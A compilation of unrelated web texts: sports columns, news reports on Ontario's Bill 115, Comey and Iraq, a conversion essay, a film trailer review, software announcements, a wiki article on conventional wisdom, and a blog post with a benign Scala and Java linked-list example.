Painter referenced the decision not to foul with 17 seconds left in regulation, the Boilermakers leading by three, needing to make sure of one thing: Little Rock doesn't hit a 3-pointer to tie it. Purdue didn't foul. Little Rock's Josh Hagins hit a 3-pointer to tie it.
“In hindsight,” Painter said, “I should have got a foul there at the very end.”
Those are things they said publicly. Here is something they have said to me, privately: Their team needs more playmakers. They know, OK? Their hope was to overcome that roster deficiency with an abundance of 3-pointers and a low number of turnovers. And when this team was shooting well and was careful with the ball, it was almost unbeatable.
The Boilermakers have had an incredible frontcourt for the past two years, 7-footers A.J. Hammons and Isaac Haas and 6-8 Edwards being joined this season by 6-9 Caleb Swanigan. They will have an incredible frontcourt again next season, even with Hammons gone to the NBA. Haas, Swanigan and Edwards? Those are three future pros, all starting for Purdue, assuming Swanigan doesn't make the biggest mistake of their life and turn pro now.
But the backcourt, it needs help. Painter knows. They have a plethora of shooters but not since Lewis Jackson in 2012 has they had a player who can break down the other team, create a shot for themselves or a teammate, just make something happen when all hell is breaking loose and Purdue is losing a late lead to Cincinnati in the 2015 NCAA tournament or to Little Rock here in 2016.
NEWSLETTERS Get the IndyStar Motor Sports newsletter delivered to your inbox We're sorry, but something went wrong The latest news in IndyCar and the world of motor sports. Please try again soon, or contact Customer Service at 1-888-357-7827. Delivery: Sun - Fri Invalid email address Thank you! You're almost signed up for IndyStar Motor Sports Keep an eye out for an email to confirm your newsletter registration. More newsletters
What cannot keep happening here is the fifth-year point guard, because there is no continuity there. Painter has built their program – and they have rebuilt it, after the slump of 2013 and '14 (combined record: 31-35) – on program players who work hard and stay hungry and coalesce over the years into something greater than the sum of its parts.
Except for the point guard.
Former North Central standout Ronnie Johnson's transfer to Houston after the 2013-14 season had Painter plugging in Colorado State transfer Jon Octeus last season, and Texas-Arlington transfer Johnny Hill this season. Octeus was pretty good a year ago. Hill was serviceable this season. Neither was good enough, neither had the continuity and the comfort level to be good enough, for what Painter is trying to build, and for what Purdue fans are hoping to see.
And Purdue fans, they're mad today. They were furious after this loss, some of them clamoring on social media for Purdue to fire Painter and replace them with someone who can win 26 games and then go to the NCAA tournament and win some more.
And Purdue fans are right to be angry. A loss like Thursday night? The Purdue roster against the Little Rock roster?
Purdue fans are mortified, especially with the predictability of what happened Thursday. When Purdue has lost this season, when Purdue has looked terrible, it has lost and it has looked terrible because its backcourt wasn't able to handle pressure.
Purdue's players have to be better, but so does its coach. Its coach knows that. The roster for next season won't provide much comfort, though. Beyond the frontcourt, which will be loaded again and yet not nearly as good – not with A.J. Hammons in the NBA – the backcourt looks similar. Lots of shooters. Another guard on the way in four-star recruit Carsen Edwards of Humble, Texas, a 6-1 guard who is more of a shooter than a playmaker.
Purdue has scholarships available and will scour the country for unsigned high school seniors, junior college transfers and – yes – graduate transfers with immediate eligibility. At this point, that is all Purdue can do. C.J. Walker isn't walking through that door; the playmaking Tech superstar backed off their commitment to Purdue and chose Florida State.
Purdue will be next season what it was this season. Huge. Deep. Talented. Imperfectly constructed.
Matt Painter knows. Expect them to rectify some of what ailed Purdue this season, and Thursday night. Just don't expect them to rectify it completely before next season.
But please, please, please, Purdue fans – the angriest among you – stop the counter-productive calling for Matt Painter's head. For one, it's not going to happen. You're wasting your time, and worse: It's sending a message to current recruits, the playmakers Painter will court for the future, that the Boilermakers have a coach in trouble.
And the Boilermakers do not. Painter has to get better, the Purdue fan base is right to expect more from a roster as good as this one, but he's not going anywhere.
But understand this: The kind of recruits Painter needs to hit the next level? Playmakers with lots of high-major options? They're not picking a school where the loudest noise is hysterical shrieking from the angriest fans.
That makes a program look unstable, and Purdue is not unstable. Underperforming at times, yes. Unstable? No. Eight NCAA tournament appearances in the past decade. Almost 23 victories per year.
Purdue needs to be a little bit better. But it could be a whole lot worse.
Find IndyStar columnist Gregg Doyel on Twitter at @GreggDoyelStar or at www.facebook.com/gregg.doyel.
A former Mormon explains what being Catholic means to them
Last week the Mormon missionaries stopped by looking for me. This hadn't happened in awhile, but it's not an unfamiliar experience. Five years ago I formally petitioned to have my name removed from the LDS Church's membership records, and after that I didn't hear from them for a while. But eventually the mail started coming again. And now there were these white-shirted 20-year-olds on my doorstep asking for me.
I invited them in. They declined, citing the “three man rule”. (They're not supposed to be alone with women unless another man is on the premises.) So we stood awkwardly in the doorway while I explained that the reason they never saw me at church was that I had apostatized from the Mormon faith some years before, and was now a practicing Catholic.
They asked why and I briefly explained. (I believe that Rome, not Salt Lake, is rock on which Christ's Church is resting.) They challenged me to read the Book of Mormon and I cheerfully declined. (I've read it twice before, but now I have other reading priorities.) In their final go-for-broke play, they read me a three-verse passage from the Book of Mormon, and urged me to ask God directly about the truth of the Mormon faith. I gently explained that this would not be appropriate, because it isn't a question that I have anymore. When God has already answered the deepest question of your heart, the correct response is to embrace the truth gratefully. It would just be churlish to keep pestering them about it.
After that I stood patiently and let them have the final word, accepted their phone number (on condition that they wouldn't return unless I called it), and wished them a pleasant day.
My husband doesn't understand why I bother talking to missionaries. They just says, “not interested” and closes the door, which is perfectly reasonable. It's like hanging up on phone solicitors; if you're not going to buy anything they'd probably rather save the time than listen to the pleasantries.
Still, with several generations' worth of Mormon ancestors behind me, I feel that Mormons are “my people” in a kind of ethno-cultural sense. I can't just slam the door on them, and if the local Mormon authorities want an account of me, I'm willing to give it. For all its flaws, Mormonism is the faith of my forefathers. But even beyond familial loyalty, I feel deeply grateful to the LDS Church for its incalculable contribution to my childhood and youth. Mormons taught me my Bible stories and gave me lots of no-nonsense straight talk about chastity. It's hard to exaggerate the value of that in these confused times. Mormons also gave me a wonderful appreciation for what supportive, functional, family-oriented church communities can do. There's a lot to be said for them and I would have been happy to stay, but for the inconvenient fact that I wasn't a believer, and wasn't willing to pretend.
I'm one of those cautious types who spent quite a number of years flitting on the outskirts of the Church before taking the plunge. Conversion itself, when I finally got around to it, wasn't a particularly thrilling experience. Swimming the metaphorical Tiber was a lot like (I suspect) swimming the actual Tiber: I felt cold, muddy and rather alone. This is not so uncommon, I have found, among intellectual converts. We gobble the “good stuff” (theology, spirituality) in the safety of our bedrooms, and find that this sweet fruit has a pit in the middle. The intellectual journey is thrilling, but at the time of conversion itself, the unpleasant social components dominate the foreground. As my catechist recognized (he found me puzzling in the extreme), my original “Here I am, Lord,” was not offered with particular enthusiasm or delight.
Just when you thought things were settled between Ontario's teachers unions and the province, the rivals are facing off once again — this time, in court.
Five unions are challenging the constitutionality of Bill 115, the "Putting Students First Act." The controversial legislation imposed contracts on education unions and banned them from striking, when collective bargaining stalled in 2012.
The Bill not only required ETFO to "bargain" with a metaphorical gun to its head, it dictated the terms of the bargain. ETFO legal submission
The hearing begins in Ontario Superior Court at Toronto's Osgoode Hall this morning and is scheduled to last all week.
The results of the case will have strong implications for the power of governments in Canada to dictate the terms of union contracts and to take away the right to strike.
The Ontario Public Service Employees Union (OPSEU) is leading the Charter challenge, joined by the Elementary Teachers Federation of Ontario (ETFO), the Ontario Secondary School Teachers Federation (OSSTF) and two other unions.
OPSEU's submission to the court says provisions in Bill 115 violate the freedom of association enshrined in the Canadian Charter of Rights and Freedoms.
"Collective bargaining is firmly entrenched as a full-fledged Charter right," OPSEU's lawyers write in their submission. They argue the Charter prevents "powerful entities, such as employers and government, from running roughshod over the interests of employees."
The government argues that the Charter protection of collective bargaining does not stop it from imposing wage restraint.
"This case is about what constitutionally permissible options are available to government when it faces a looming fiscal challenge," lawyers for the province write in their submission to the court.
The government's lawyers argue that Bill 115 does not violate the Charter because the contracts were imposed only "after many months of good-faith consultation."
Bill 115 was imposed by the government of former premier Dalton McGuinty. It was repealed not long before Kathleen Wynne won the Liberal leadership. (Canadian Press) Bill 115 was introduced by the Liberal government of then-premier Dalton McGuinty in late August 2012, just days before the school year began.
"The Bill not only required ETFO to "bargain" with a metaphorical gun to its head, it dictated the terms of the bargain," ETFO lawyers write in their submission to the Ontario Superior Court.
Four months later, amid the growing threat of strikes, the government used the legislation to impose contracts on education unions that froze salaries, stopped teachers from moving up the salary grid as they gained seniority, and ended hefty payouts for unused sick days. The imposed contracts banned strikes until 2014.
Immediately after the "Putting Students First Act" was used to impose the contracts, the legislature repealed it. Mere days later, Kathleen Wynne won the Liberal leadership convention and became premier.
The unions say it is necessary to challenge the bill retroactively to prevent governments from doing something similar in future.
If the court agrees the union members' charter rights were violated, it will have to decide whether the violation was "justified in a free and democratic society," whether the government's goal with the legislation was important enough to override a constitutional right.
A decision is not expected for weeks, and whatever the ruling at the Ontario Superior Court level, it's likely to be appealed. Ultimately, if they win, the unions are asking for compensation, including lost wages.
Sponsored by Vocalocity, HashiCorp has developed a fully open-source, MIT licensed AWS provider plugin for Vagrant 1.1.
Using the same Vagrant workflow you've come to know and love, you will be able to launch and provision instances in EC2 or VPC, just as you would a VirtualBox machine today.
Paired with local virtualization, the AWS provider can vastly improve your end-to-end workflow, unlocking use cases for Vagrant which simply didn't exist before.
The provider will be released as open source at the same time as Vagrant 1.1, and works on Mac, Windows, and Linux. While no release date has been set, Vagrant 1.1 is targeted for later this month.
A preview video is embedded below so you can see the AWS provider in action.
The true power of the Vagrant AWS integration comes when it is paired with local virtualization. VirtualBox (or the upcoming VMware support) should be used for local development as much as possible, while AWS can satisfy some additional use cases:
Develop on a powerful EC2 instance when your local work machine just isn't enough, or when you need more development environments than local virtualization can handle on a single machine.
Test your provisioning scripts in the actual environment where they'll be deployed for production.
Use Vagrant to launch development, staging, and production environments.
Vagrant can use the same Vagrantfile -- with no modifications -- to launch VirtualBox, AWS, and any other provider, so you can mix and match the provider you use as you go. A future blog post will cover the Vagrant 1.1 provider system in-depth.
I'm very excited about the opportunities and use cases this unlocks, as well as the potential to dramatically improve end-to-end productivity and testability of your work environments.
Former FBI Director James Comey is expected to testify that they believe President Trump was deliberately trying to meddle in the FBI's investigation of Russian interference in the presidential election, according to a report late Friday.
Comey has come to believe the president intended to influence him, according to CNN.
ADVERTISEMENT
Trump made several questionable requests of Comey regarding the investigation, according to reports and transcripts leaked since Trump's surprise decision to fire Comey as head of the FBI on May 9.
Trump reportedly asked Comey to “let this go,” speaking of the investigation into Trump's former national security adviser Michael Flynn, The New York Times reported earlier this week. Flynn is under investigation for their conversations with Russia during Trump's presidential campaign.
Additionally, Trump repeatedly asked Comey when Comey would announce the president themselves was not part of the investigation. Trump has denied collusion between their campaign and Russia.
The latest trailer has just dropped for “War for the Planet of the Apes” and I still have a raging hard on. In case you live under a rock or are just an oblivious dickhead, this will be the third film in the prequel series to the 1970's classic “Planet of the Apes”. The prequels have far exceeded expectations and if “War” keeps up the quality of the first two films (which it seems certainly up for the task), then we are looking at one of the best trilogies since Lord of the Rings.
Originally I had zero interest in this series as I found the concept to be daft and never truly appreciated the original, writing it off as too camp. Eventually, with one month to Dawn of the Planet of the Apes release, I was finally convinced (forced) to sit through “Rise of the Planet of the Apes” (fuck me these titles are a mouthful). I was genuinely shocked, I found the film to be brilliant and far better than anything I would have expected. Suddenly my interest went from zero to all aboard the hype train for Dawn. Not only did “Dawn” also far exceed my expectations it also cemented itself as one of my favourite films of all time.
The tone in both trailers is very bleak and while “Dawn” had a pretty melancholy tone, everything looks dreary and miserable here. “War” will take place two years after the events of “Dawn” where Koba has set in motion a conflict between the humans and the apes. Caesar now finds themselves fighting a war they didn't start and has to endure the toll that war takes as the leader of the apes. The leader of the humans is a ruthless colonel played by Woody Harrelson, who believes they are fighting for humanity's survival. In order to achieve this, they believe there can be only one dominant species on earth. The simian flu which killed off most the human population is set to make a return and has been described as evolved.
Director Matt Reeves has revealed a number of plot elements such as the existence of other super intelligent apes in the form of “Bad Ape” played by newcomer Steven Zahn who will apparently offer some comic relief. While Bad Ape is the only other bilingual ape announced, this raises an interesting question as to how many other bilingual or evolved apes there are in the world. This could vastly increase the scope of the film. The latest trailer has also revealed a gorilla who is sided with the humans. Little is known of this character yet or why their motivations lie with the humans but I think it's safe to assume he's an antagonist.
Harrelson's Colonel will not so much be a villain but rather a sympathetic antagonist according to director Matt Reeves. In the first trailer, we see them holding a photograph which we can only assume is their young son who has most likely passed away. While we know they have no plans of sharing the planet with the apes their motives are still somewhat unclear. Perhaps the simian flu has returned and the Colonel sees the only way of culling the contagion is by exterminating the apes.
Caesar will be at their lowest point by the start of the film according to reports. Caesar has always carried the positive traits of humanity by showing strength, mercy, and kindness while actively avoiding humanity's more destructive nature. At the end of “Dawn” we see that Caesar has abandoned the fundamental law governed by the apes and come to realize that the apes aren't so different from humans. My guess is that after countless losses and through personal tragedy, Caesar will lose all regard for human life and eliminate any human who comes for them and their kin.
The little girl revealed in both trailers is mute and will be adopted by Maurice after Caesar kills their father in self-defence. This detail alone lets us know that Caesar has no qualms taking a life to protect their own. How this little girl will fit into the grand scheme of things is still a mystery however they could be the driving force for regaining Caesars “humanity”.
“War for the Planet of the Apes” will be released internationally on the 14th of July and I for one cannot wait. This is easily my most anticipated film of 2017.
David Ryder / Reuters U.S. Marine Corps veteran Martin Silverhawk sits outside a Home Depot store, where they have been living since evacuating their home, during the Okanogan Complex fire in Omak, Washington August 25, 2015. In north-central Washington, a cluster of deadly fires dubbed the Okanogan Complex has burned more than 258,339 acres (104,546 hectares), overtaking last year's Carlton Complex fire as the state's largest on record. REUTERS/David Ryder
Veteran homelessness has dropped nearly in half since 2010, thanks to partnerships and programming, the U.S. Department of Housing and Urban Development (HUD) announced on Monday.
On a given night in January, there were fewer than 40,000 homeless veterans, according to the country's annual Point-in-Time count. That marked a 47 percent decrease since the same count was conducted six years prior.
The success was due to the White House's first-ever strategic plan to end veteran homelessness and a unique partnership between HUD and the Department of Veteran Affairs. Through the collaboration, HUD provides rental assistance to homeless veterans and the VA complements it with case management and clinical services.
Since 2010, more than 360,000 veterans and their families have been permanently housed, rapidly rehoused or were spared from becoming homeless through HUD and VA programs.
“The dramatic decline in veteran homelessness reflects the power of partnerships in solving complex national problems on behalf of those who have served our nation,” Robert A. McDonald, VA secretary, said in a statement. “The men and women who have fought for this nation should not have to fight to keep a roof over their head.”
The sharp declines are also being attributed to first lady Michelle Obama's homelessness campaign.
NICHOLAS KAMM via Getty Images US First Lady Michelle Obama speaks about the Administration's efforts to end veteran homelessness and the importance of mayoral leadership in the process at the 84th annual Winter Meeting of The United States Conference of Mayors in Washington, DC, on January 21, 2016. / AFP / Nicholas Kamm
In 2014, Obama launched the Mayors Challenge to End Veteran Homelessness, which tasked mayors across the U.S. to commit to wiping out the issue in their cities.
Since then, 27 communities and two states have effectively ended veteran homelessness, according to HUD.
That included Houston and New Orleans, which managed to put an end to chronic veteran homelessness last year.
Last June, Mayor Annise Parker announced that Houston had eliminated the issue by housing 3,650 veterans over the course of three years.
New Orleans accomplished the same achievement last year by bringing together agencies that hadn't previously collaborated before. Now, should a veteran become homeless, the city has systems in place to house them within 30 days.
Numerous studies over the years have found that the concept of housing first, which touts providing housing to homeless people in need before addressing their health or economic issues, is effective and cost efficient.
Through the HUD and the VA's efforts, there have been declines across a number of sectors of veteran homelessness. In January, the number of veterans sleeping on the streets dropped to 13,000. That marked a 56 percent decline since 2010.
But while the number of homeless veterans is steadily dropping, general homelessness has dropped only incrementally.
Since 2007, the number of homeless people has declined by 11 percent.
Some cities, however, are even seeing disconcerting spikes.
In New York City, for example, the number of single adults seeking shelter skyrocketed by 95 percent in a decade.
And while the Obama administration originally pledged to end chronic homelessness this year, it decided to push back the deadline to 2017 due to budget constraints.
Advocates say they're feeling optimistic about the progress being made among homeless veterans, but say they can't fully celebrate until every veteran is housed.
Help us complete Godot's API reference! By: Rémi Verschelde
A bit less than 3 months ago, we made a call for contributors to help us work on filling the class reference. We got a handful of new documentation writers who did a great job, helping document some of the most important classes for the upcoming 2.1 release. Many of those improvements were backported to the stable 2.0 branch too and are available in the freshly released 2.0.4.1 and on the online documentation already.
What's the current status?
We all love some stats every now and then, so here are some numbers. Since our call for help, 900 methods have been documented, i.e. an increase by almost 50% compared to the previous status (2634 documented today vs. 1730 at the end of April)! It brings us short of 60% of completion on the methods' side, which is arguably the most important one (constants or member variables often have self-explanatory names, though we will definitely document them all too little by little).
We still need your help to reach 100%!
As you can see on the above graph, the progress has been impressive lately, but there's still a lot of work to do. Sadly we're still only a handful of contributors working on the documentation, so the work is huge.
If we can grow the team and get more regular contributors, this would reduce the load for everyone and we should be able to close the gap pretty fast.
To write documentation for Godot, you don't have to be a power user, but mostly you need to have some time available. So if you do, please consider helping us with the effort! Check the previous blog post on this topic for all the details about the workflow. Note the link to the class reference status which shows the current progress and who's working on what.
If you have any questions, get in touch with the Documentation team on Freenode IRC, channel #godotengine-doc.
Conventional wisdom is the body of ideas or explanations generally accepted as true by the public and/or by experts in a field.
Origin of the term [ edit ]
The term is often credited to the economist John Kenneth Galbraith, who used it in their 1958 book The Affluent Society:[1]
“ It will be convenient to have a name for the ideas which are esteemed at any time for their acceptability, and it should be a term that emphasizes this predictability. I shall refer to these ideas henceforth as the conventional wisdom.[2] ”
However, the term dates back to at least 1838.[3][n 1] Conventional wisdom was used in a number of other works prior to Galbraith, occasionally in a positive[4] or neutral[5] sense, but more often pejoratively.[6] However, previous authors used it as a synonym for 'commonplace knowledge'. Galbraith specifically prepended 'The' to the phrase to emphasize its uniqueness, and sharpened its meaning to narrow it to those commonplace beliefs that are also acceptable and comfortable to society, thus enhancing their ability to resist facts that might diminish them. They repeatedly referred to it throughout the text of The Affluent Society, invoking it to explain the high degree of resistance in academic economics to new ideas. For these reasons, they are usually credited with the invention and popularization of the phrase in modern usage.
Accuracy [ edit ]
Conventional wisdom is not necessarily true. It is additionally often seen as an obstacle to the acceptance of newly acquired information, to introducing new theories and explanations, and therefore operates as an obstacle that must be overcome by legitimate revisionism. This is to say, that despite new information to the contrary, conventional wisdom has a property analogous to inertia that opposes the introduction of contrary belief, sometimes to the point of absurd denial of the new information set by persons strongly holding an outdated (conventional) view. This inertia is due to conventional wisdom being made of ideas that are convenient, appealing and deeply assumed by the public, which hangs on to them even as they grow outdated. This inertia can last even after the paradigm has shifted between competing conventional idea sets.
The concept of conventional wisdom may also be applied or implied in a political sense, being closely related to the phenomenon of talking points. It is used pejoratively to refer to the idea that statements which are repeated over and over become conventional wisdom regardless of whether or not they are true.
In a more general sense, it is used to refer to the accepted truth about something which nearly no one would argue about, and so is used as a gauge (or well-spring) of normative behavior or belief, even within a professional context. One such example was conventional wisdom in 1950, even among most doctors, was that smoking was not particularly harmful to one's health.[citation needed] Conventional wisdom in 2011: it is. Another: It might be used in this manner discussing a technical matter such as the conventional wisdom was that a man would suffer fatal injuries if they experienced more than eighteen g-forces in an aerospace vehicle. (John Stapp shattered that myth by repeatedly withstanding far more in their research, peaking above 46 Gs).
Sometimes, people in society form conventional ideas about what other people in the past considered to be conventional wisdom. For example, take the following sentence: "It is widely believed that prior to Christopher Columbus people thought the world was flat, but in actuality, scholars of that time had long accepted that the earth is a sphere."
The above sentence is true; people today often think that Columbus discovered the world to be round, when in fact the world's roundness was already widely known by Columbus' time. However, if enough people read and believe the above sentence, the above sentence will eventually supplant the old belief (the old belief in past belief in a flat earth). The above sentence would become the new conventional wisdom. (Ironically, however, this would also turn the above sentence, the new conventional wisdom, into a false claim; because the new conventional wisdom would propose that people are confused about past beliefs in a way that they actually wouldn't be.)[clarification needed]
Integration with scientific evidence [ edit ]
Evidence-based medicine is a deliberate effort to acknowledge expert opinion (conventional wisdom) and how it coexists with scientific data. Evidence-based medicine acknowledges that expert opinion is "evidence" and plays a role to fill the "gap between the kind of knowledge generated by clinical research studies and the kind of knowledge necessary to make the best decision for individual patients."[7]
See also [ edit ]
Notes [ edit ]
^ "It will be seen that we appeal, in such a case, neither to the records of legislation nor yet to the conventional wisdom of our forefathers."—(presumably) T. Frelinghuysen
As those who have read my previous entries know, I quit my job of three years as senior software engineer at Creative Commons to pursue the free software project I've been running, MediaGoblin. I'd explain a bit further what MediaGoblin is but actually there's no reason to: we're in the middle of running a fundraising campaign, and we put a video together that explains everything wonderfully already. So what you really ought to do is click through to:
Go ahead visit the above link! Check out the campaign! Watch the video! Donate! Excitedly link the campaign to your friends! Then come back here. I'll still be around.
Okay, back? Awesome. So the campaign has gone live and is going well. It's been a major portion of my life the last couple of months. For the one and a half months leading up to the campaign, it was my life. And it still is. I stressed out about it all the way leading up to the campaign launch and I am, in fact, still stressing out about it now. But it's a good kind of stress. We're getting a lot of positive reactions from people, and I feel great about that. I really do believe that MediaGoblin is the most important thing I've ever worked on in my life, and so having this be a success is important to me. And having it be important to other people... well that's important to me, too.
There are a couple of things that people have been asking me about related to the campaign. People seem fairly curious about the process of making the video and ramping up the campaign, and especially I keep getting asked, "Why did you go through the Free Software Foundation? Why not Kickstarter?" Those are both really good questions, so I'll take a shot at answering them.
Why the Free Software Foundation? Why not Kickstarter?
Kinda long, so here's a tl;dr:
We don't dislike Kickstarter
FSF offered for us to do the donation campaign through them; didn't have all the features we wanted, but were willing to implement them
We decided to go with them because they threw their weight behind our campaign, because of their integrity, and because of our aligned ideals.
Let's go with this one first, because people seem so curious about it. What I'll first say was that this wasn't a decision we rushed into. A couple of months ago, I was in Boston and meeting with MediaGoblin co-conspirators Will Kahn-Greene and Deb Nicholson about this. We were hanging out at and around the FSF offices. At that point, we knew we were launching a campaign, but didn't know the details. And this was a major point of discussion: do we go with Kickstarter, or we go with the Free Software Foundation? We did know was that John Sullivan had expressed interest in us doing things through the Free Software Foundation, and so that was an option.
We chose the Free Software Foundation over Kickstarter for various reasons. The reason we didn't go with Kickstarter isn't that we dislike Kickstarter, or thought that it would be particularly bad for us. I actually think that Kickstarter is doing a good job in paving a way forward for projects to be funded in ways that frees them to focus on what they need to; if I have a major complaint, it's that I wish people would mostly hold projects to the standard that if they're donating to them, they shouldn't be locking down their stuff. If the public is funding you, doesn't it make sense that you are in a sense beholden to the public? I wish people would hold things they donate to to a standard where they encourage projects to adopt free licenses. But anyway, that's more of a wish that I wish we'd see more free software and free culture benefitting from Kickstarter like systems than something against Kickstarter. And Kickstarter was fairly tempting for various reasons: they've done a good job of proving themselves. We know their stuff works, it's fairly expected how stuff would run, and it's something people recognize and feel comfortable giving money to. My friend Aeva said, "When I see something on Kickstarter, I have a temptation to just throw money at it." So not choosing Kickstarter would mean leaving a lot of that behind.
So why did we choose the Free Software Foundation? There was reason to be cautious about it: we knew what to expect if we went with Kickstarter. While I have a lot of trust in the Free Software Foundation, we couldn't be sure how things would work out running a campaign like this because they simply hadn't done such a thing before. We had done something similar with the FSF with Liberated Pixel Cup, but it wasn't on this scale. When we met with John, we listed a series of things that we'd still need: we needed the ability for the system to offer rewards (such as the 3d model, t-shirt, etc options we have now), we needed the ability to theme the campaign page, we needed to be able to email people who donated with updates as the campaign progressed, we needed the form to work this way and that, we needed a progress bar that updated automatically each time someone donated, and so on. The FSF didn't have a way set up to do these things yet, and we wanted to go live with the campaign in a month and a half. Would the FSF be able to do it on time? Would the FSF want to do it? John said that they thought so, and yes. This was a direction that they were interested in going in, both for themselves and likely for future projects, so it was a good opportunity for them to push their systems in that direction.
At that point, we decided to go with the FSF. First of all, the fact that this was a new thing but that the FSF was interested in pushing in this direction means there'd be a certain kind of guinea-pig uncertainty, but it also meant something else: the FSF had a lot of faith in MediaGoblin and were willing to throw their weight behind it. That meant a lot, and also meant something strategically: there are a lot of projects swimming around on Kickstarter and etc right now, and it would be easy to get lost in that pool. The fact that the FSF was willing to back us meant that we'd stand out in a certain way, at least to a certain audience. And we could benefit from their connections and experience.
There's another aspect to it too: the FSF is a nonprofit. I'm not sure whether this is resonating with donors or not, but at least to me, it's significant: the FSF is an organization that has a mission and integrity. By going through the FSF, we are also beholden to that mission and integrity. The FSF wasn't going to just toss all the money raised by this project over to us: we had to show that we were doing the work to advance the project to get it. To me, that seems like a feature, at least one that's donor-facing (though I'm not sure whether or not people are picking up on that). You can have whatever opinion you want about the FSF, but one thing is indisputable, maybe even above any other org I know of: they stick with their principles. And I hope that message that the FSF was backing us passed on to people. And to some people, it seemed to. (I guess also, if you go through a nonprofit, donations are tax-deductable. Some people seem to appreciate that.) The FSF is also taking an "administrative cut", just as Kickstarter would, of the money raised. I think it's also significant that the organization that gets that cut be one who's working to advance things that I believe in.
There were some other benefits too: we had a lot more control over our site design by doing things on our own (and MediaGoblin's usual graphic designer, Jef van Schendel, was commissioned to do the design of the campaign site, and did an awesome job). But... I think the being endorsed by an organization with that kind of trust and integrity was the most important thing. And I'll also admit that there is an element of personal interest here: is it possible for a nonprofit to reproduce the same kind of experience that Kickstarter has? Because that's significant to me. And one thing that would come out of this is that the FSF would be using free software to run the campaign also. The thing is mostly run by CiviCRM, so unlike Kickstarter, advancements gained in running it could benefit the software and other people running such software. And if we could prove that this works, that would be good.
That said, even after we made that decision, even though I have a strong amount of trust in the FSF, the proof of the pudding is in the eating, and I couldn't be anything but nervous about things until the campaign actually went live. I'm happy to say that things did work out and we had a successful launch. People seem very responsive to our campaign, and the FSF's stuff is working great. And the FSF really has thrown themselves behind the campaign. I've been working with both people from the FSF systems team and especially John Sullivan and Zak Rogoff, one of the new campaigns team members (who's really been a pleasure to work with so far). They really have been trying hard to make this a success, and I'm really pleased with it.
We've had a good start, but we've still got a long way to go. But one thing's for sure, the campaign is only going to be a success if people like you pitch in and spread the word about the campaign. So please help... and spread the word!
And I guess that blogpost was long enough, so the "making of the campaign" will have to be a part two!
The San Francisco rallied to beat the Philadelphia Eagles thanks to the passing of Alex Smith, who distributed the ball to Michael Crabtree, Josh Morgan, Kendall Hunter and Vernon Davis and rushing of Frank Gore, which carved up a fairly hollow Philly interior. But the biggest play came defensively.
Philadelphia tried to drive late in the 4th quarter to recapture the lead from SF when Michael Vick found Jeremy Maclin on a wide receiver screen. Maclin was able to reach out and snare the ball in, but they had to catch up to the ball, forcing them to adapt to the throw and move a step slower than he'd have liked. This allowed the defense to catch up.
Surprisingly, it wasn't any of the regular 49ers suspects who ended up making the play. It was instead 280+ pound defensive end Justin Smith who stripped Maclin from behind. Dashon Goldson recovered it and the Niners ran out the clock from there.
Check out the forced fumble by Smith after the jump! (Also, numerous other highlights from the San Francisco-Philadelphia game!)
For more on 49ers football, go to Niners Nation.
* Foreign element remains but is small
* Fighters and explosives from Syria
BAGHDAD, Nov 18 (Reuters) - Al Qaeda in Iraq is becoming more Iraqi and less dominated by foreigners as the insurgent group increasingly joins forces with Saddam Hussein's outlawed Baath party, the commander of U.S. forces said on Wednesday.
Investigations into massive suicide bombings in Baghdad on Oct. 25, in which more than 150 people died, indicated that explosives or fighters were coming across from Syria, U.S. General Ray Odierno also said.
The U.S. commander's comments reinforced accusations by the government of Shi'ite Prime Minister Nuri al-Maliki that al Qaeda and former Baathists were working together to undermine improved security and elections expected to be held in January.
Maliki's government has also accused neighbouring Syria of giving a safe haven to Baathists plotting attacks in Iraq.
"Al Qaeda in Iraq has transformed significantly in the last two years. What once was dominated by foreign individuals has now become more and more dominated by Iraqi citizens," Odierno told reporters at the U.S. military's main base in Baghdad.
"There's still a small foreign element to al Qaeda, there are some who used to be Sunni rejectionists or ex-Baathists who are involved in this because of course they don't want the government to succeed."
Overall violence in Iraq has fallen sharply in the past 18 months and November so far has experienced one of the lowest civilian casualty levels since the 2003 U.S. invasion.
But attacks by suspected Sunni Islamist insurgents like al Qaeda remain common.
The twin suicide bombings in Baghdad on Oct. 25 devastated the Justice Ministry and the Baghdad governorate headquarters, while two similar suicide bombings on Aug. 19 killed almost 100 people at the foreign and finance ministries.
"We believe that there will be attempts to conduct more attacks between now and the elections because they want to destabilise those," Odierno said.
The election is expected to occur between Jan. 18-23 but the date has been cast into doubt after Vice President Tareq al-Hashemi vetoed a law needed for the ballot to take place.
Odierno said multiple investigations had been launched into the Oct. 25 bombings, involving U.S. and Iraqi investigators.
"My experience is there probably was some movement of fighters or explosives coming from Syria," they said when asked if the investigations had indicated any links to Syria. (Reporting by Michael Christie; Editing by Jon Hemming)
In recent years, we have seen a dramatic rise in the number of languages used in mainstream projects. In particular, languages which run on the JVM or CLR have become quite popular (probably because sane people hate dealing with x86 assembly). Naturally, such languages prefer to interoperate with other languages built on these core platforms, particularly Java and C# (respectively). Collectively, years of effort have been put into devising and implementing better ways of working with libraries written in these “parent languages”. The problem is that such efforts are crippled by one fundamental limitation: circular dependencies.
Let's take Scala as an example. Of all of the JVM languages, this one probably has the potential for the tightest integration with Java. Even Groovy, which is renowned for its integration, still falls short in many key areas. (generics, anyone?) With Scala, every class is a Java class, every method is a Java method, and there is no API which cannot be accessed from Java as natively as any other. For example, I can write a simple linked list implementation in Scala and then use it in Java without any fuss whatsoever (warning: untested sample):
class LinkedList [ T ] { private var root: Node = _ def add ( data: T ) = { val insert = Node ( data, null ) if ( root == null ) { root = insert } else { root. next = insert } this } def get ( index: Int ) = { def walk ( node: Node, current: Int ) : T = { if ( node == null ) { throw new IndexOutOfBoundsException ( index. toString ) } if ( current < index ) { walk ( node. next , current + 1 ) } else { node. data } } if ( index < 0 ) { throw new IndexOutOfBoundsException ( index. toString ) } walk ( root, 0 ) } def size = { def walk ( node: Node ) : Int = if ( node == null ) 0 else 1 + walk ( node. next ) walk ( root ) } private case class Node ( data: T, var next: Node ) }
Once this class is compiled, we can use it in our Java code just as if it were written within the language itself:
public class Driver { public static void main ( String [ ] args ) { LinkedList<String> list = new LinkedList<String> ( ) ; for ( String arg : args ) { list. add ( arg ) ; } System. out . println ( "List has size: " + list. size ( ) ) ; for ( int i = 0 ; i < list. size ( ) ; i++ ) { System. out . println ( list. get ( i ) . trim ( ) ) ; } } }
Impressively seamless interoperability! We actually could have gotten really fancy and thrown in some operator overloading. Obviously, Java wouldn't have been able to use the operators themselves, but it still would have been able to call them just like normal Java instance methods. Using Scala in this way, we can get all the advantages of its concise syntax and slick design without really abandoning our Java code base.
